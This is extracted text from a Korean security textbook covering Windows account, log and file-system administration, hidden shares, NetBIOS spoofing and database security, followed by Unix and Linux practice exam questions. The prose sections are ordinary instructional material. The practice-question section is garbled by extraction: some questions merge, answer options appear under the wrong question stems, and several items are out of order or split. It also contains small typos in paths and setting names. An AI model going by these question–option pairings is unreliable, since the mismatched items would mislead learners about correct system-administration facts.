44 chapter 2. 윈도우 시스템 관리 가. 윈도우 시스템 계정/그룹 관리 (1) 내장된 사용자 계정 내장된(builtin) 계정이란 관리자가 계정을 만들지 않더라도 자동으로 윈도우2000 서버 설치와 함께 만 들어진 계정들을 말한다(표 4-31 참고). 일반적으로 Administrator, Guest 등과 같은 계정은 모든 시스템에 공통으로 존재하기 때문에 공격 자들에게 노출되어 있다. 이 문제는 보안 상 큰 위협이 될 수 있으므로 이러한 계정을 다른 사람이 사 용하지 못하게 이름을 바꾸거나 암호를 복잡하게 사용해야 한다. 44
45 (2) 윈도우 그룹 그룹(Group)이란 파일이나 자원의 접근 권한을 동일하게 가지는 사용자들의 모임을 말한다. 사용자 계 정을 그룹의 멤버로 만들면 그 사용자는 그룹에게 부여된 모든 허용 권한을 상속받게 된다. 그룹에는 글로벌 그룹과 로컬 그룹이 있다. 글로벌 그룹(Global Group)은 현 도메인의 사용자 계정을 업무 기능 또는 지리적인 위치 별로 묶어주 는 데 사용되며 로컬 그룹(Local Group)은 사용자들에게 네트워크 자원에 접근할 수 있는 권한을 부여 하기 위해 쓰인다. 다음 [표 4-32]는 윈도우 그룹을 분류한 표이다. 45
46 내장된 그룹의 속성은 내장된 글로벌 그룹, 글로벌 로컬 그룹, 로컬 그룹에 따라 다음 [표 4-33]과 같 은 내장된 그룹의 속성을 가진다 내장된 도메인 로컬 그룹은 [표 4-34]와 같이 구분될 수 있다. 46
47 내장된 로컬 그룹은 [표 4-35]와 같이 구분될 수 있다. 나. 윈도우 로그 관리 윈도우 서버에서의 로그 관리는 이벤트 뷰어 라는 관리 도구를 사용하여 관리하며, 응용프로그램 로 그, 보안로그, 시스템 로그의 3가지 로그를 기본 로그로 한다. 그리고 도메인 컨트롤러로 구성된 윈도 우 서버는 '디렉터리 서비스 로그'와 '파일복제 서비스 로그'가 추가되며, DNS 서버로 구성된 윈도우 시스템에서는 'DNS 서버 로그'가 추가된다. 이벤트 뷰어에서 관리하는 이벤트 로그파일(.evt)로 저장된 로그는 기록된 각 이벤트의 이진 데이터 형 식으로 보관된다. 47
48 다음 [표 4-36]은 윈도우 기본 로그에 대한 설명이다. 다. 윈도우 시스템 환경 변수 설정 시스템에서 특정 명령어를 실행할 때 그 실행 명령이 저장된 경로를 지정하지 않더라도 자동으로 그 경로를 찾을 수 있도록 드라이브 경로 또는 파일 이름과 같은 정보를 포함하고 있다. 환경변수 설정은 윈도우 화면에서 [시작] [제어판] [시스템]의 [고급]탭 내 [환경 변수]창에서 설정을 변경할 수 있다. 환경변수는 [표 4-37]과 같이 크게 사용자 환경변수와 시스템 환경변수로 나뉠 수 있다. 48
49 chapter 3. 윈도우 시스템 보안 가. 윈도우 파일 시스템 보안 NTFS는 NT File System 의 약자로, NT에서 사용하는 파일 시스템을 의미한다. 만약 FAT32로 사용하고 있다면 보안 상 NTFS로 변환해서 사용하는 것을 권장한다. (1) FAT32를 NTFS로 변환하기 o 윈도우 파티션의 파일 시스템을 FAT32로 사용 중이라면 NTFS로 변환하기 위해 우선 윈도우 시스템을 부팅하고 명령어 프롬프트 창을 띄어 다음과 같이 입력한다. - C: 드라이브에는 윈도우2000이 설치되어 있다고 가정 하에 다음 명령을 입력한다. - C:> CONVERT C: /FS:NTFS- 만약 멀티 부팅을 사용하는 경우 FAT32로 된 D: 드라이브에 Windows OS가 설치되어 있다면 다음 명령을 입력한다. - C:> CONVERT D: /FS:NTFS 주의 : FAT32에서 NTFS변환은 되지만 NTFS에서 FAT32로 변환은 되지 않는다. (2) 파일 시스템의 암호화 NTFS 5.0 파일 시스템은 디스크 상의 파일 시스템을 읽고 쓸 때 자동으로 암호화하고 해독한다. NTFS 를 사용하는 경우 접근을 허가해준 사람만이 사용자 계정과 패스워드를 통해 접근이 가능하다. 윈도우98에서는 폴더 공유를 통해 접근 제어를 할 수 있었지만 윈도우2000에서는 폴더뿐만 아니라 파 일 단위로도 암호화가 가능하다. 즉, 같은 폴더 안의 파일이라도 허가되지 않은 파일은 아무나 열 수 없다. 폴더에 암호화를 하면 그 폴더 안에 들어가는 파일들은 모두 암호화 된다. 이렇게 암호화된 폴더 나 파일들은 복사, 이동을 해도 암호화된 속성이 없어지지 않는다. 또 파일 단위로 감사가 가능하다. 즉, 어떤 사람이 어떤 요일 몇 시 몇 분에 파일을 열어보고 어떤 사람이 파일을 열려다 실패했는지 알 수 있다. (3) 공유 폴더 보안 o 공유 폴더 보안은 윈도우NT에도 있었다. 예를 들어 폴더 이름 뒤에 '$'을 붙여 공유를 해놓았다고 보자. 이름을 O2man$이라 하면 이 폴더는 숨김 속성이 되어 보이지 않게 된다. 이 폴더에 접근하기 위해서는 Windows 주소창 란에 \\O2man$와 같이 입력해 주어야 볼 수 있다. 반드시 디렉터리 이름 뒤에 $를 입력해 주어야 볼수 있다. 그리고 여기서 알아두어야 할 것은 공유한 폴더를 복사한 경우 복사된 공유 설정이 없어지지만 복 사 원본 폴더의 공유 설정은 계속 유지된다. 49
50 o 위처럼 한 후 파일을 %system roo%\inetpub\ftproot%에 놓고, ftp://(해당 ip주소나 도메인)에 접속하면 감쪽같이 없어진 것을 확인할 수가 있다. o 자신의 컴퓨터에서 숨김 파일을 보고 싶으면, [도구]내-[폴더 옵션]의 [보기]탭에서 '숨김 파일 및 폴더 표시'를 체크하면 된다. (4) 윈도우에서의 Quota 설정 윈도우에서의 사용자 디스크 할당량 제한은 NTFS 파일 시스템에서만 사용이 가능하며 FAT, FAT32 파 일 시스템에서는 지원되지 않으며, 디렉터리 단위가 아닌 파티션 단위로 쿼터가 적용된다. 사용자는 파 티션 전체 디스크 사이즈가 보이는 게 아닌 쿼터가 적용된 사이즈만 보이게 된다. 디스크 할당량 설정 은 관리자 권한을 가진 사용자만이 설정할 수 있으며 모든 사용자에게 동일한 조건을 줄 수도 있으며 각각의 사용자마다 다르게 지정할 수도 있다. 할당량 제한은 설정 후 사용자가 로그인 하는 시점부터 적용된다. 나. 윈도우 시스템 취약성 (1) NetBIOS를 통한 스푸핑 NetBIOS 이름은 NetBIOS 인터페이스를 사용하는 시스템 환경에서 NetBIOS 자원을 식별하는데 사용된 다. 예를 들어 \\ 이것이 바로 NetBIOS에서의 표현식이다. MS 윈도우 네트워크의 NetBIOS 이름은 서비스 도중 스푸핑이 가능하다. NetBIOS는 Network Basic Input/Output System 의 약자이며 DOS를 운영체제로 사용하는 IBM PC용 고급 프로그래밍 인터페이스로서, LAN 상에서 서버와 클라이언트 간의 통신에 주로 사용된다. 일반적 으로 NetBIOS는 UNC를 사용하여 \\computer\shares 로 표현된다. 윈도우 2000부터는 NetBEUI를 사용하지 않고 TCP/IP 프로토콜 하나만 사용한다. o NetBIOS를 통한 연결 : - \\IP주소\공유이름 : 이 명령을 사용하면 NetBIOS 이름 확인을 구성하지 않아도 된다. - \\도메인\공유이름 : 이 명령을 사용하면 DNS를 통해 정식 도메인 이름(FQDN)을 사용하여 컴퓨터에 연결할 수 있다. NetBIOS에서 스푸핑(Spoofing)이란 마치 자신이 특정 한 컴퓨터인 양 가정하는 것으로 LAN 환경에서 당연한 것이지만, NetBIOS 인터페이스는 원격에서 스푸핑이 일어날 수 없는 것으로 알려져 왔었는데 스푸핑이 실제로 원격에서 일 어나는 것이 확인되어 문제가 되고 있다. 50
51 이 취약성을 차단하기 위해서는 윈도우 2000에 최신 한글 서비스 팩을 설치 해주면 된다. 스푸핑에서 문제가 되는 서버는 윈도우 NT/2000 모두가 해당되며 가급적 인터넷을 통해 137 포트를 열어 놓지 않는 것이 최선의 보안 방법이다. 51
52 제 3절. 데이터 베이스 보안 chapter 1. 데이터베이스 개요 가. 데이터베이스 데이터베이스는 사람들이 관심을 가지고 있는 데이터를 모아둔 것이다. 일상생활에서 자주 접할 수 있 는 데이터베이스의 예로는 은행의 고객 자료의 데이터베이스나 학교에서 학생 자료 데이터베이스, 도 서관에서의 도서 데이터베이스 등이 있다. 이러한 예에서 보는 것처럼 하나의 데이터베이스에는 서로 관련된 데이터들이 컴퓨터가 처리할 수 있는 형태로 저장되어 있으며 이렇게 저장된 데이터는 사용자 의 물음에 대해 대답할 수 있어야만 의미를 가질 수 있다. 도서관 데이터베이스를 예로 든다면, 데이터베이스에는 현재 도서관에 있는 책들에 대한 데이터 즉 작 가, 출판년도, 도서명 등등의 데이터들이 저장되어 있으며 사용자는 자신이 찾고자 하는 책에 관한 정 보를 데이터베이스로부터 추출해낼 수 있다. 즉, 데이터베이스는 데이터를 보관하고 사용자에 물음에 대답하는 시스템이다. 데이터베이스에 저장된 데이터는 끊임없이 변화한다. 예를 들어 도서관의 경우 새로운 책이 들어올 때 마다 새로운 도서에 대한 데이터가 저장되어야 하고 책이 대출되었을 때나 반납되었을 때 대출과 반납 에 대한 정보가 저장되어야 한다. 데이터베이스는 이러한 외부의 변화에 맞추어 적절히 저장된 데이터 를 변경시킬 수 있어야 하며, 즉 데이터베이스는 새로운 데이터를 저장하거나 기존의 데이터를 삭제, 변경시키는 작업을 저장된 데이터가 일관성을 유지하도록 관리되어야 한다. 나. 데이터베이스 관리시스템 데이터베이스를 생성하고, 관리하며, 데이터로부터 사용자의 물음에 대한 대답을 추출하는 프로그램의 집합을 데이터베이스 관리시스템(DBMS, Database Management System)이라 한다. 데이터베이스 관리 시스템의 첫 번째 목표는 바로 데이터를 저장하고 이 데이터로부터 유용한 정보를 얻어내기 위한 효율 적이면서도 편리한 방법을 사용자에게 주는데 있다. 데이터베이스 관리 시스템이 데이터를 관리하기 위해서는 저장할 데이터의 구조를 정의해야 하며, 이 렇게 정의된 구조에 따라 효율적으로 데이터를 저장해야 한다. 또한 이렇게 저장된 데이터로부터 좀 더 빠르게 정보를 추출할 수 있기 위한 방법들을 제공해야 한다. 실제로 데이터를 관리하는 데 있어서는 여러 문제점이 발생하게 된다. 예를 들어 학사 관리 데이터베 이스에서 학생의 출생년도가 1800인 데이터가 있다거나 또는 학생의 소속 학과가 실제로 존재하지 않 는 학과로 되어있는 경우, 또한 학번이 같은 사람이 둘 이상 있는 것과 같이 잘못된 데이터가 데이터 베이스에 저장될 경우 이로부터 얻은 정보는 아무런 의미가 없게 된다. 이와 같은 잘못된 데이터가 데 이터베이스에 저장되는 것을 막는 것 또한 데이터베이스가 해야 할 일들 중 하나이다. 보통의 경우에 데이터베이스는 동시에 여러 사람들이 사용하게 되며, 이렇게 하나에 데이터베이스가 동시에 여러 장소에서 사용될 경우, 한명의 사용자가 사용할 때와는 다른 문제점을 발생시킬 수도 있 다. 데이터베이스를 효율적으로 사용하기 위해서는 이처럼 동시에 데이터베이스에 접근하는 것을 가능 하도록 해야 하며, 이때에 발생할 수 있는 문제를 데이터베이스 관리 시스템이 해결해야 한다. 52
53 다. 개체-관계 모델 데이터베이스를 설계하는 과정에서 가장 먼저 해야 할 일은 사용자가 관심이 있는 데이터는 무엇이며 그 데이터로부터 얻고자 하는 정보는 무엇인지에 관해 조사하는 것이다. 이러한 과정을 사용자의 요구 분석이라고 하는데 이 단계에서는 사용자가 요구하는 실세계의 데이터를 분명하고 이해하기 쉽게 나타 내어 다음 단계에서 사용자의 요구에 맞는 데이터베이스를 만들 수 있도록 해야 한다. 이렇게 현실세계의 수많은 데이터 중에서 관심의 대상이 되는 데이터만을 추려내어 추상적 형태로 나 타내는 것을 데이터 모델링이라고 한다. 언어가 가지고 있는 모호성 때문에 보통의 언어보다 좀 더 형 식화되고 다이어그램 등을 사용하여 표현하게 되는데 이를 개체-관계 모델이라 한다. 라. 관계형 데이터베이스 관계형 데이터베이스는 모든 데이터들을 테이블과 같은 형태로 나타내어 저장하는 데이터베이스이다. 일상생활에서 데이터를 정리하여 표현할 때 흔히 표와 같은 방법을 사용하게 되는데, 관계형 데이터베 이스는 이 '표'의 개념을 사용해서 데이터를 구성하는 방법을 사용하고 있다. 예를 들어 고객들의 주소와 전화번호를 정리할 때 표, 즉 테이블을 사용한다면, 첫 번째 열은 이름, 두 번째 열은 주소, 세 번째 열은 전화번호를 써서 나타낼 수 있다. 개체-관계 모델에서 정의한 데이터들을 실제로 관계형 데이터베이스를 사용하여 저장하기 위해서는 개 체-관계 모델을 테이블로 변환시키는 과정이 필요하다. 즉 개체-관계 모델은 실제 데이터베이스와는 상관없이 저장하고자 하는 데이터를 정의한 것이며, 테이블은 데이터를 관계형 데이터베이스에서 실제 로 표현하는 방법이다. 관계형 데이터베이스에서는 단순히 데이터를 테이블의 형태로 나타낼 뿐만 아 니라 저장된 데이터로부터 원하는 정보를 추출할 수 있는 방법을 정의하고 있다. 53
54 chapter 2. 데이터베이스 보안 가. 데이터베이스 보안 정의 데이터베이스 보안은 데이터베이스에 저장되어 있는 데이터에 대하여 인가되지 않은 접근, 의도적인 데이터의 변경이나 파괴 및 데이터의 일관성을 저해하는 우발적인 사고 등으로부터 데이터 혹은 데이 터베이스를 보호하는 것이다. 나. 데이터베이스 보안 위협 요소 아래 [표 4-38]은 데이터베이스 보안의 위협 요소에 대한 설명이다. 54
55 다. 데이터베이스 보안 요구 사항 아래 [표 4-39]는 데이터베이스의 안전한 보안을 위해 필요한 보안 요구 사항이다. 라. 데이터베이스 보안 구현 데이터베이스 보안은 접근 통제(Access Control)를 통해서 이루어진다. 데이터베이스에 대한 접근 통제 란 정당한 권한을 부여 받은 사용자에게만 데이터를 이용할 수 있게 하는 것으로 아래 [표 4-40]과 같 이 크게 사용자 인증(Authentication)과 권한 부여(Authorization) 과정으로 구성되며 데이터 기밀성을 위해 암호화(Encryption)과정이 같이 수행된다. 55
56 제 1장. 시스템 보안 연습 문제 56
57 1. 소프트웨어 클러스터는 저가의 서버들을 여러 개 연결하여 대형 컴퓨터의 성능을 내는 기술을 말하며, 개별 노드의 장애를 극복한 중단 없는 서비스와 노드 의 추가에 따른 성능 확장을 가능하게 해준다. 소프트 웨어 클러스터 구성에 대하여 올바른 설명은? 1 소프트웨어 패키지의 논리적 집합 구성 2 소프트웨어 패키지의 물리적 집합 구성 3 소프트웨어 패키지의 물리적 분산구성 4 소프트웨어 패키지로 구성한 논리적 분산 구성 2. 유닉스의 쉘 종류에는 Bourne 쉘(sh), C 쉘(csh), Korn 쉘(ksh), Bash(bash) 등이 있는데, 이에 대한 설명 으로 옳지 않은 것은?(OS는 Solaris7을 기준으로 한다.) 1 csh, bash 등 쉘의 종류에 따라.histroy.bash_history 등으로 사용자별 사용 명령어를 로깅한다. 2 사용자 쉘을 지정하지 않으면 기본적으로 /bin/sh 이 지정된다. 3 사용자와 커널의 인터페이스 역할을 한다. 4 /etc/passwd 두 번째 필드로 사용자 로그인 쉘을 지정한다. 3. 다음은 AIX 4.3 관리자 화면인 SMIT이다. 계정에 관 한 정책을 설정하는 메뉴는? 4. System V 계열의 각 실행단계의 설명이 옳지 않은 것은? 1 실행단계 0 : 전원 꺼짐 상태-컴퓨터를 꺼도 안전한 상태 2 실행단계 1 : 시스템 관리 상태 3 실행단계 S : PROM 감사 단계 4 실행단계 2 : 다중 사용자 모드 5. 다음은 파일에 대한 정보를 알 수 있는 명령들이다. 설명이 틀린 것은? 1 find : 파일 hierarchy를 검색한다. 2 whereis : 이진파일과 맨(man)페이지도 검색한다. 3 which : 전체디렉터리에서 실행 가능한 파일을 검색한다. 4 file : 파일 타입을 볼 수 있다. 6. 유닉스 시스템에서 각 사용자가 로그인할 때마다 시스템에 의해 자동으로 실행되어야 하는 내용(예: PATH 변수, 프롬프트 지정 등)을 정의해 놓는 파일은 무엇인가? 1 /etc/profile 2 /etc/passwd 3 /etc/aliases 4 /etc/resolv.conf 7. 유닉스 시스템에서 아래와 같이 명령어를 실행했을 때 ( )에 나오는 결과는? $ umask 022 $ touch hello $ ls -l hello ( ) 1 kisa other 0 Jul 24 14:40 hello 1 -rw-rw-rw- 3 -rw-r--r-- 2 -r-x--x--x 4 -rw 다음 유닉스 명령어는 시스템 사용자에 대한 정보 를 얻기에 적당하다. 해당 명령어와 기능이 짝지어진 것 중 올바르지 않은 것은? 1 소프트웨어 라이센스 관리 2 시스템 기억장치 관리 3 보안 및 사용자 4 응용프로그램 1 who, w - 사용자 및 사용자의 컴퓨터 확인 2 last - 사용자들의 로그인/로그아웃 일시 기록 확인 3 lastcomm - 사용자들의 시스템 명령 및 프로세스 기록 확인 4 traceroute - 네트워크 현재 접속 현황 확인 57
58 9. 유닉스 서버의 관리자가 매번 서버 부팅 시 실행시 키기 위한 스크립트 S99bootjob 을 작성하였다. 이 스 크립트를 저장할 위치로 적당한 디렉터리는? (단, 부팅 시 run level은 full multiuser mode이다) 1 /etc/rc.d/rc3.d 2 /etc/init.d 3 /etc/cron.d 4 /etc/xinetd.d 10. 솔라리스에서 /etc/default 디렉터리는 디폴트 환경 이 지정된 곳이다. 이 디렉터리에 속한 login 파일의 내용이 다음과 같을 때, 아래 설명 중 틀린 것은? # cat /etc/default/login CONSOLE=/dev/console PASSREQ=YES UMASK=022 SYSLOG=YES 1 원격에서 root 계정으로 로그인이 가능하다. 2 사용자 로그인시 패스워드를 요구한다. 3 umask가 022로 설정되어 있다. 4 모든 root 로그인과 중복된 로그인 실패를 로그에 남긴다. 11. 유닉스 시스템 부팅 시, 시스템의 실행 레벨(Run Level)과 초기화에 필요한 프로세스들을 지정해 놓는 파일은 무엇인가? 1 /etc/inetd.conf 2 /etc/rc.local 3 /etc/inittab 4 /etc/fstab 13. 유닉스 시스템 환경에서 커널은 운영체제의 핵심 부분으로 시스템의 전반적인 업무를 수행하므로 커널 을 안전하게 관리하는 것과 커널 자체의 보안이 깨지 지 않도록 하는 것은 상당히 중요한 문제이다. 다음은 여러 유닉스 시스템에서 커널 재구성을 위한 방법을 설명하고 있다. 이에 대한 설명으로 옳지 않은 것은? 1 HP-UX 유닉스 시스템에서는 SAM을 이용하거나 명 령어 집합을 통해 커널을 재생성할 수 있다. 2 Solaris 유닉스 시스템에서는 ndd를 사용하거나, system 파일을 수정하여 커널을 재구성할 수 있다. 3 AIX 유닉스 시스템에서는 SMIT을 이용해서 커널을 재구성할 수 있다. 4 Linux 시스템은 공개 운용체제이므로 해당 사이트 에서 최신 커널을 다운로드 받아 별도의 재구성 없이 설치만 해주면 된다. 14. 유닉스 시스템에서 history는 상당히 중요하게 쓰 인다. 일반적으로 공격자가 시스템에 접속을 하면 이 러한 history파일을 없애는 것이 보통인데, 실수로 history 파일을 삭제하지 않았거나 혹은 시스템 관리의 목적으로 전에 실행시켰던 명령어들을 다시 불러낼 수 있도록 하기 위해 history 사용을 위한 설정을 각 쉘에 서 한다. 각 쉘에 따른 history size에 대한 설정으로 옳지 않은 것은? 1 csh계열 : set history = ksh계열 : export HISTSIZE = bash계열 : export HISTSIZE = sh계열 : set savehist = 유닉스 시스템 환경에서 쉘이나 프로그램의 실행 환경을 지정하는 숨김 파일에 대한 설명으로 틀린 것 은? 1.login은 특정 쉘에 관계없는 초기 환경을 지정하여 login할 때 자동으로 수행하는 파일이다. 2.forward는 자신에게 온 전자우편을 다른 곳으로 그대로 전송하기 위한 파일이다. 3.history는 쉘을 사용할 때 수행한 명령어의 일부를 저장하는 파일이다. 4.rhosts는 시스템 접속 시 암호대신 서명 파일을 사 용해서 접속할 수 있는 사용자를 지정하는 파일이 다. 15. pwconv 명령은 password 파일과 shadow 파일의 동기화를 수행하는 명령이다. 다음 중 pwconv 명령의 설명 중 틀린 것은? 1 password 파일을 수정 후에 pwconv 명령을 수행 한다. 2 password과 shadow 파일을 일치시킨다. 3 shadow 파일에는 없고 password 파일에만 존재하 는 내용을 shadow 파일에 갱신한다. 4 password 파일에는 없고 shadow 파일에만 존재하 는 내용을 password 파일에 갱신한다. 58
59 16. SunOS에서 보안 패치를 하려면 기존의 패치가 있 는 디렉터리의 정보를 참조해야 한다. 다음 보기 중 디렉터리 정보가 모여 있는 곳은? 1 /var/spool/package 2 /var/spool/patch 3 /var/adm/patch 4 /var/sadm/patch 17. 사용자 계정 관리 지침에 대한 설명 중 옳지 않은 것은? 1 서버 관리자 : SUPER USER로 서버의 모든 권한을 갖고 1개만 존재 2 SYSTEM APPLICATION 관리자 : 각 SYSTEM 관리자 로서 권한을 갖고, SUPER USER의 일부 권한을 허 용 3 APPLICATION 개발자 : APPLICATION 개발을 위한 사용자로서 이 계정은 개발 종료 시 사용자 등록, 폐기 절차에 따라 폐기 4 일반 사용자 : NFS, FTP 등 사용자로서 서버 자원 에 대한 접근 불허 18. 아래 그림은 HP-UX의 관리자 화면이다. 이 관리자 tool을 활용하여 접근 제어를 할 수 있는데 PAM 데몬 개념을 제공한다. 이 관리자 도구의 이름은? 20. PAM(Pluggable Authentication Modules)은 프로그 램이 사용자 인증을 필요로 하면, 적절한 인증방법에 대한 함수를 포함하는 라이브러리를 제공한다. 다음 중 SunOS의 PAM 데몬에 대한 설명으로 적절하지 않 은 것은? 1 Login, FTP, Telnet 등의 일반적인 서비스 인증 부 분에 접근제어 설정을 할 수 있다. 2 PAM 데몬을 활용하여 su(switch user)의 접근제어 설정을 할 수 있다. 3 PAM.conf를 활용하여 환경 설정을 할 수 있다. 4 일반 계정도 인증 방식을 쉽게 변경시킬 수 있다. 21. 유닉스 시스템의 세 가지 핵심 컴포넌트는 무엇인 가? 1 Kernel, Shell, File System 2 Directories, Sub-directories, Files 3 PROM, Kernel, Shell 4 Ethernet, NFS, NIS+ 22. Solaris 7 시스템에서 커널은 시스템의 자원(CPU, Memory,...)을 관리하며 시스템이 원활히 돌아갈 수 있도록 제어해준다. 커널을 Customize하는데 사용되는 파일은? 1 /etc/kernel 2 /etc/system 3 /dev 4 /etc/hosts 23. 리눅스 시스템의 보안성을 높이기 위해 시스템 관 리자는 OS설치 시 불필요한 서비스에 대한 제거를 통 해 한층 강화된 서비스를 제공할 수 있다. 이에 대한 방법으로 옳지 않은 것은? 1 smit 2 sam 3 admin 4 admintool 19. 일반적으로 유닉스 시스템 설치 시 기본적으로 외 부에서 접근 및 제어가 가능하다. 서버 시스템에서 원 격으로 접속할 수 있는 서비스를 제공하는 데몬은? 1 RPC 2 Telnet 3 TCP 4 NetBios 1 리눅스 시스템을 설치하기 전 우선적으로 어떤 서 비스를 시스템에서 제공할 것인지 정해야 한다. 2 OS 설치 시 설치하고 싶은 서버 S/W목록을 만들 어서, 필요한 패키지만 개별적으로 선택한 후 설치 한다. 3 때때로 선택한 패키지 설치 시 선행 필수 패키지 (prerequisite)를 설치해야 할 필요가 있다. 4 설치된 패키지를 삭제할 때 연관성이 있는 선행 필 수 패키지가 자동 삭제되므로 따로 삭제하지 않아 도 된다. 59
60 24. 리눅스 시스템은 커널 보안을 위해 많은 변수를 설정할 수 있도록 제공하고 있다. 커널 변수 설정은 /etc/sysctl.conf에서 추가할 수 있다고 한다. 아래 보기 중 커널 변수에 대한 설명으로 맞지 않는 것은? 1 net.ipv4.tcp_syncookies는 소켓에서 SYN을 받아들 이는 용량이 한계에 다다르면 syncookie를 보낸다. 2 net.ipv4.tcp_max_syn_backlog는 SYN플래그 가진 패킷에 대한, 최대한 대기시킬 수 있는 패킷의 수 이다. 3 net.ipv4.icmp_echo_ignore_all은 모든 ICMP ECHO 요청을 무시하는 것으로 시스템 초기 구축 시 설 정한다. 4 net.ipv4.icmp_echo_broadcats는 브로드캐스트 또는 멀티캐스트 ICMP 요청을 무시한다. 25. 리눅스 시스템 설치 후 관리자는 /etc/lilo.conf 파 일을 열어 lilo보안 설정을 했다고 한다. 아래 내용은 lilo.conf파일의 내용을 보여주고 있다. 아래에서 보여 주는 lilo.conf 파일 내용에 대한 설명으로 맞지 않는 것은? # vi /etc/lilo.conf boot = /dev/haa map = /boot/map install = /boot/boot.b time-out=00 prompt Default = linux restricted password= image=/boot/vmlinuz label=linux initrd=/boot/initrd img root=/dev/hda6 read-only 1 시스템 부팅 시 linux single로 암호 없이 루트로 로그인하지 못하게 time-out, restricted등을 추가 설정한다. 2 /etc/lilo.conf 파일에 패스워드를 설정하면 암호화 되므로 사용자가 파일을 읽더라도 암호를 알 수 없다. 3 /etc/lilo.conf 파일 안에 변경된 설정값을 시스템에 반영하기 위해서는 /sbin/lilo -v명령을 실행해야 한 다. 4 리눅스 파일시스템이 ext2라면 chattr명령을 사용해 서 lilo.conf 파일을 수정할 수 없도록 설정할 수 있다. 26. df 명령으로 본 할당된 파일시스템 사용률이 90% 에 다다른 디렉터리가 있다. 파일시스템 설정변경을 고려하지 않아도 되는 이 static 디렉터리는 다음 중 어느 것인가? 1 /var 2 /tmp 3 /home 4 /sbin 27. 유닉스에서는 일정시간 간격으로 동일한 작업을 반복해서 수행하게 하는 cron 기능을 제공한다. cron 에 대한 설명으로 틀린 것은? 1 매일 지정한 시간 또는 매주 지정한 요일에 동일 작업을 반복하는 것이 가능하다. 2 각 사용자별로 cron에서 실행시키고자 하는 내용을 설정할 수 있다. 3 설정된 내용을 조회하거나 새로운 내용 추가 시 cron'명령을 사용한다. 4 특정 사용자가 cron 기능을 사용하지 못하도록 제 한할 수 있다. 28. 아래 명령의 실행결과를 보고 맞는 설명을 고르 면? [root@sis]# crontab -l 0 0 * * 0 /bin/test.sh [root@sis]# 1 위의 명령(crontab -l)은 crontab을 설정하기 위한 명령이다. 2 위 명령의 실행 결과 /bin/test.sh 명령이 생성된다. 3 본 시스템은 매주 일요일 0시 0분에 /bin/test.sh을 실행한다. 4 crontab 명령은 root 만이 실행할 수 있다. 29. 유닉스 시스템에서 여러 가지 명령어 중 현재 로 딩 된 쉘을 점검하여 적절한 서비스를 제공하는지에 대한 서비스 제어를 할 수 있다. 현재 로딩 된 쉘 종 류를 보는 명령어는? 1 df 2 ls 3 ps 4 find 30. Solaris 7 시스템에서 현재 설치된 패키지 중 필요 없는 패키지를 제거하는 명령어로 옳은 것은? 1 admintool 2 pkgtool 3 pkgadd 4 pkgrm 60
61 31. 서버의 보안 관리를 통해서 보다 안전하게 서비스 가 유지될 수 있도록 해야 한다. 다음 서버의 보안관 리 내용을 기술한 것 중 올바르지 않은 것은? 1 계정에 대한 패스워드는 사용자 계정관리 지침을 만들어 지침에 준한 설정을 한다. 2 RPC 등 일반적으로 취약성이 알려진 네트워크 프 로토콜은 무조건 삭제한다. 3 서버는 물리적인 보안문제를 선결한 후 가동을 원 칙으로 한다. 4 슈퍼유저의 권한은 보안 관리자/서버운영자로 제한 되며 ID, 패스워드는 극히 제한된 사용자에 의해 관리된다. 32. Solaris Sparc 시스템 운영 중 다운 시 cdrom으로 부팅하는 올바른 방법은? 1 boot -s cdrom 2 boot -S cdrom 3 ok> boot cdrom 4 ok> cdrom boot 건 sync 명령어를 사용해야 한다. 3 sync 명령은 sync 서브루틴을 수행하는데 시스템이 정지한 경우, 파일시스템이 무결하도록 sync 명령 을 수행한다. 4 sync 명령은 수정한 inode, 연기된 블록 입출력, 읽 기-쓰기 맵핑된 파일을 포함한 모든 기록되지 않은 시스템 버퍼를 디스크에 기록한다. 36. AIX 유닉스 시스템에서 superblock에 대한 설명으 로 옳지 않은 것은? 1 /etc/filesystems에서 superblock에 대한 정보를 찾 을 수 있다. 2 superblock은 logical volume의 4096 byte offset에 위치하며, 크기는 4096bytes이다. 3 superblock 정보를 보기 위해서는 dumpfs 명령어 를 사용한다. 4 superblock이 손상(corrupt)되었을 때 조치 방법으 로 fsck 명령을 사용한다. 33. 시스템의 적절한 설정은 침해사고 대응을 위한 가 장 중요한 부분이다. Solaris Sparc Machine에서 시스 템 설정을 초기화하는 EEPROM 상태에서의 명령어는? 1 set-default 2 ok> set-default 3 boot-cdrom 4 boot-single 34. 시스템에 관한 보안은 관리자들이 주기적인 점검 이 필요하다. 다음 중 호스트 관련 보안 설정에 관한 설명 중 옳지 않은 것은? 1 PATH 환경변수 설정 2 관리자의 startup 파일 접근 권한 3 cron, at 관련 파일 접근 권한 4 suid 관련 위험성이 있으므로 모든 setuid 설정 파 일 접근 제한 35. AIX 유닉스 시스템을 배우려는 초보 사용자는 상 급관리자가 시스템을 rebooting하기 전 쉘 상에서 몇 번의 sync, sync, sync 명령을 타이핑하는 것을 보았다. 여기서 쓰인 sync 명령어에 대한 설명으로 옳지 않은 것은? 1 파일시스템은 write할 때, 일단 memory cache에 write하고, 어떤 조건이 되면 disk에 write한다는 것 이 기본전제가 된다. 2 memory 안에 cache되어있는 파일시스템 write 정 보를, disk로 내리기 위해서 sync 명령을 사용하고 시스템 종료 혹은 부팅명령어와는 상관없이 무조 37. 유닉스 시스템에서 lost+found 디렉터리에 대한 설명으로 옳지 않은 것은? 1 디스크 오류나 부정확한 시스템 종료에 의해 파일 들이 잃어버린 상태가 될 수 있는 파일을 의미한 다. 2 시스템이 부팅될 때 fsck가 실행이 되어 이런 파일 들을 찾아내어 lost+found 디렉터리에 저장한다. 3 디스크 파티션에는 lost+found 디렉터리가 있으며, lost+found는 모든 디렉터리에 존재한다. 4 잃어버린 파일들의 디렉터리로 어떤 디렉터리에도 속하지 않은 디스크 장소를 가리키는 파일을 의미 한다. 38. 솔라리스와 AIX 유닉스 시스템의 파일 시스템 정 보, 디바이스 정보, 테이프 드라이브 위치, 현재 사용 자 기록에 대한 위치를 비교한 것이다. 이 중에서 옳 지 않은 것은? 1 aix : /etc/filesystems, solaris : /etc/vfstab 2 aix : /dev, solaris : /device 3 aix : /dev/rmt/0, solaris : /dev/rmt/0 4 aix : /etc/utmp, solaris : /var/adm/utmpx 61
